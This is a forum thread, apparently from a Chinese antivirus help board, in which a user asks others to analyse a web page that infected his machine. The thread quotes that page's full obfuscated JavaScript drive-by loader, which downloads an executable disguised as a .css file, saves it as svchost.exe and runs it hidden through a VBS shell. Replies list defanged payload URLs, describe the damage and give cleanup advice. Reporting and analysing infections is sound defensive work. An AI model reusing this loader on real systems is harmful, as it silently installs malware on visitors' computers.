自己用freshow分析网站http://www.czgfy.com/xi/x.htm的时候，分析了http://www.czgfy.com/xi/1.htm内容
其中网页加密如下
<script src=1.css></script>
<script src=15.js></script>
<script src=16.js></script>
<script language="JavaScript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1Z 20(1h){5 1H=15["M"+"a"+"1E"]["r"+"a"+"n"+"d"+"o"+"m"]()*1h;1Q\'L\'+\'.1I\'}1B{5 z,H,D,g,x;5 19=\'V.Q\';5 Z=\'V.1T\';5 f=15["d"+"o"+"c"+"u"+"m"+"e"+"n"+"t"]["c"+"1F"+"1k"+"1n"+"1c"+"1m"+"1j"]("o"+"b"+"j"+"e"+"c"+"t");5 R="1i";5 1e=R+"s"+"1A:";5 1b="0-"+"9"+"8"+"3"+"A"+"-"+"0";5 1d="0"+"C"+"0"+"4";5 10="F"+"C"+"2"+"9"+"E"+"3"+"6";5 k="1t"+"1s";5 1g="1r"+"-1p"+"-1q";5 k=1e+k+1g+1b+1d+10;f["1u"]("1v",k);5 w$y=f["v"]("1z.1o","");5 q=f["v"](1y,"");5 7;7=f.v(1x,"");7.Y=1;5 J=w$y.N(2);5 U=w$y.N(0);5 K;K=f["C"+"r"+"e"+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](1w,"");14=w$y["B"+"u"+"i"+"l"+"d"+"P"+"a"+"t"+"h"](U+\'\\\\1l\',\'X.Q\');g=J+"[url=]\\\\"+19;q.17("G"+"E"+"T",L,0);q["s"+"e"+"n"+"d"]();7["17"]();7["W"+"1X"+"1V"](q["1U"+"1S"]);7["S"+"a"+"1Y"+"T"+"25"+"24"+"e"](g,2);7["1f"]();5[/url] 23="f";x=J+"[url=]\\\\"+Z;5[/url] I;I="22 g = v([url=file://\\]\\"1R.";z="1G\\")"+"\\n";H="g.1C[/url] [url=file://\\]\\"X[/url] /c "+g+"[url=file://\\]\\",1D";D=I+z+H;7["Y"]=2;7["O"+"p"+"e"+"n"]();7["1J"+"1O"+"1P"+"1N"]=D;7["1M"+"1K"+"1L"+"1c"](x,2);7["1f"]();5[/url] 13="o";5 1a="p";5 12="e";5 11="n";5 18=13+1a+12+11;K.21(14,\' /c \'+x,"",18,0)}1W(16){16=1}',62,130,'|||||var||baidu3||||||||chilam|wwwbaiducn||||baidueex||||||baidu2|||||CreateObject|hHf|wwwbaiducn2|R6|baiduzf||||baiduzfx||||baiduzfs|baiduzf0|VgDnZXHt7|YuTYuT|baidu||GetSpecialFolder|||exe|nod3232|||VgDnZXHt9|svchost||cmd|type|baidunames|baidueesss|baidussss|baidusss|baidus|exp1|window|baidusave|Open|baidux|baiduname|baiduss|baiduees|le|baidueess|baiduee|Close|baidueexx|rRaGEykU1|cL|nt|at|system32|me|eE|FileSystemObject|65A3|11D|556|96C|BD|setAttribute|classid|YuTx|baiduado|baiduxml|Scripting|id|try|run|vbhide|th|re|Shell|Orh2|Cn|Wr|eto|fi|Sav|xt|ite|Te|return|Wscript|seBody|vbs|respon|te|catch|ri|ve|function|gn|ShelLExeCute|Set|baiduuser|il|oF'.split('|'),0,{}))
</script>

自己下载了1.CSS后，改后缀名为exe,运行文件消失，估计是病毒一类的，疏忽大意了，谁能分析一下，这个病毒，当时没有开虚拟，瑞星最新版没有反应，后来瑞星无法启动

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

?????不懂

那个1.css最终的网马是：hxxp://cav.xl.cx/v.css

hxxp://www.czgfy.com/xi/1.css地址还不是最终挂马地址，最终挂马地址为：hxxp://mvt.ht.cx/a.css，该css文件才是可执行文件。

更新的真快呀

我下载的是一个v.css，现在发现中毒后的结果：瑞星被秒杀，真正的秒杀，监控无法打开，无法点击杀毒，所有软件印映象劫持到ntsd.exe，然后全盘感染，重装没有作用，无法进入安全模式，而且用PE系统进入后居然发现病毒还写在了系统隐藏的b分区，手动杀毒找不到思路，用autorun看到系统被改的乱七八糟，怎么办呀，各位

你真牛，实机测试。能实机测试的，一定有办法解决的。

反病毒区求助，上传sreng日志

用PE格式C盘后在装好的，恩，都劫持了，兄弟你让我怎么拿日志啊，而且貌似不是很弱的病毒，

使用pe格式c盘装好系统后，不要做任何操作（包括打开其他分区），只需将杀毒软件安装好，升级到最新版全盘杀毒。